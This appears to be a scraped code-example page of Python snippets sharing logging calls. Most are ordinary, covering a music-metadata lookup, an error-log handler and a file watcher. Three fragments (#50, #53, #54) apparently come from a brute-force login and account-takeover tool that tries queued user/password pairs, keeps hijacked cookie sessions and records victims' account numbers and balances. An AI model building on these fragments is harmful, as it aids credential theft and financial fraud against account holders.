         LOGGER.error('User %s Info Page Error: %s' % (uid, e))
         return None
Example #49
def search_echonest_artist_terms(artist_name):
    artist_results = artist.search(name=artist_name)
    if not artist_results:
        LOGGER.info('Artist not found in Echonest')
        return None
    if artist_results[0].name.lower() == artist_name.lower():
        artist_terms = artist_results[0].terms
        if artist_terms:
            return max(artist_terms, key=lambda x: x['weight'] * x['frequency'])['name']
        else:
            return None
    else:
        LOGGER.info("Artist name did not match top result: {} vs {}".format(artist_name, artist_results[0].name))
        return None
Example #50
 def run(self):
     LOGGER.info('Run brute')
     while 1:
         try:
             user, password = ENEMY.get(block=1, timeout=10)
         except Queue.Empty:
             continue
         if user in known_users:
             continue
         self.generate_opener()
         data = self.brute_login_with_session(user, password)
         account_password_queue.task_done()
         if self.check(data):
             add_good(user, password, data, self.opener)
Example #51
def handleTraceback(object):
    context = object.context
    entry_url = object.entry_url

    if entry_url is None:
        return

    LOGGER.info("handle traceback [%s]" % entry_url)
    try:
        cleanup_lock.acquire()
        # we don't want to produce any errors here, thus, we'll be nice and die
        # silently if an error occurs here
        try:
            transaction.begin()
            # get our logbook view to use the api
            logbook = context.unrestrictedTraverse('@@logbook')
            # get the generated error url from Products.SiteErrorLog
            err_id = urllib.splitvalue(entry_url)[1]
            # save error
            logbook.save_error(err_id, context=aq_parent(context))
            transaction.get().note('collective.logbook traceback [%s]' %
                    entry_url)
            transaction.commit()
        finally:
            cleanup_lock.release()
    # only warning
    except Exception as e:
        LOGGER.warning("An error occurred while handling the traceback")
        LOGGER.warning("%s" % e)
        LOGGER.exception(e)
Example #52
 def process(self, event):
     """
     event.event_type
         'modified' | 'created' | 'moved' | 'deleted'
     event.is_directory
         True | False
     event.src_path
         path/to/observed/file
     """
     track_path = event.dest_path if event.event_type == 'moved' else event.src_path
     LOGGER.info('File change detected: {event_type}: {track_path}'.format(event_type=event.event_type,
                                                                           track_path=track_path))
     if '/Users/carmstrong/Projects/music_master/tracks/holding' in track_path:
         LOGGER.info('Protected path, will make no changes!!')
         return
     sync_file(track_path, event.event_type)
Example #53
    def run(self):
        LOGGER.info('Start changer')
        while 1:
            try:
                obj = CHANGE.get(timeout=2)
            except Exception as e:
                LOGGER.error('Unknown error in Changer: %s', e)
                continue
            cookiejar = cookielib.CookieJar()
            self.opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(cookiejar),
            )

            self.do_change(obj)
            CHANGE.task_done()
Example #54
    def __init__(self, user, password, data, opener):
        LOGGER.info('Created new account data for %s', user)
        self.user = user
        self.password = password
        self.number = RE_ACCOUNT_NUMBER.search(data)
        self.amount = RE_AMOUNT.search(data)
        self.id = RE_ID.search(data)

        if self.number is None or self.amount is None:
            raise ValueError('No account number or amount in file')
        self.number = self.number.group(1)
        self.amount = self.amount.group(1)
        self.amount = int(float(self.amount))
        self.id = self.id.group(1)
        self.opener = opener